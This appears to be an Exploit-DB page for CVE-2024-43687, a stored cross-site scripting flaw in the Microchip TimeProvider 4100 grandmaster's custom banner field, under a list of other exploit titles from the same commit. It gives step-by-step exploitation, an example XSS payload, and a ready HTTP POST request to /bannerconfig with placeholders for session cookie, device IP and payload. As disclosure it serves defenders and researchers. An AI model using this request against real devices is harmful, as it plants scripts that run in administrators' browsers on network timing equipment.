60175c9963
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
175 lines
No EOL
3.3 KiB
Text
175 lines
No EOL
3.3 KiB
Text
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
|
|
|
|
# Exploit Author: Armando Huesca Prida
|
|
|
|
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
|
|
|
|
# Date of Disclosure: 27/06/2024
|
|
|
|
# Date of CVE Publication: 4/10/2024
|
|
|
|
# Exploit Publication: 10/10/2024
|
|
|
|
# Vendor Homepage: https://www.microchip.com/
|
|
|
|
# Version: Firmware release 1.0 through 2.4.7
|
|
|
|
# Tested on: Firmware release 2.3.12
|
|
|
|
# CVE: CVE-2024-43687
|
|
|
|
# External References:
|
|
|
|
# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
|
|
|
|
# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
|
|
|
|
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
|
|
|
|
# URL: https://www.gruppotim.it/it/footer/red-team.html
|
|
|
|
|
|
|
|
|
|
|
|
# Vulnerability Description:
|
|
|
|
|
|
|
|
The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.
|
|
|
|
|
|
|
|
|
|
|
|
# Exploitation Steps:
|
|
|
|
|
|
|
|
1- Log in to the device's web management interface.
|
|
|
|
2- Open the banner configuration panel.
|
|
|
|
3- Select the "custom banner" feature.
|
|
|
|
4- Insert the malicious JavaScript payload.
|
|
|
|
5- Apply and save the system configuration containing the custom banner.
|
|
|
|
6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.
|
|
|
|
|
|
|
|
|
|
|
|
# Example of malicious JavaScript payload:
|
|
|
|
|
|
|
|
<img src=a onerror=alert(1)>
|
|
|
|
|
|
|
|
|
|
|
|
# Proof of Concept - PoC:
|
|
|
|
|
|
|
|
By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below:
|
|
|
|
- [session cookie]
|
|
|
|
- [malicious JavaScript payload]
|
|
|
|
- [device IP]
|
|
|
|
|
|
|
|
|
|
|
|
# Exploit - HTTP Request:
|
|
|
|
|
|
|
|
POST /bannerconfig HTTP/1.1
|
|
|
|
Host: [device IP]
|
|
|
|
Cookie: ci_session=[session cookie]
|
|
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Accept-Encoding: gzip, deflate, br
|
|
|
|
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
|
|
|
|
Content-Length: 673
|
|
|
|
Origin: https://[device IP]
|
|
|
|
Referer: https://[device IP]/bannerconfig
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
Sec-Fetch-Dest: document
|
|
|
|
Sec-Fetch-Mode: navigate
|
|
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
Sec-Fetch-User: ?1
|
|
|
|
Te: trailers
|
|
|
|
Connection: keep-alive
|
|
|
|
|
|
|
|
-----------------------------9680247575877256312575038502
|
|
|
|
Content-Disposition: form-data; name="user_level"
|
|
|
|
|
|
|
|
1
|
|
|
|
-----------------------------9680247575877256312575038502
|
|
|
|
Content-Disposition: form-data; name="bannerradio"
|
|
|
|
|
|
|
|
CUSTOMIZED
|
|
|
|
-----------------------------9680247575877256312575038502
|
|
|
|
Content-Disposition: form-data; name="txtcustom"
|
|
|
|
|
|
|
|
[malicious JavaScript payload]
|
|
|
|
|
|
|
|
-----------------------------9680247575877256312575038502
|
|
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
|
|
|
|
applybanner
|
|
|
|
-----------------------------9680247575877256312575038502--
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# End |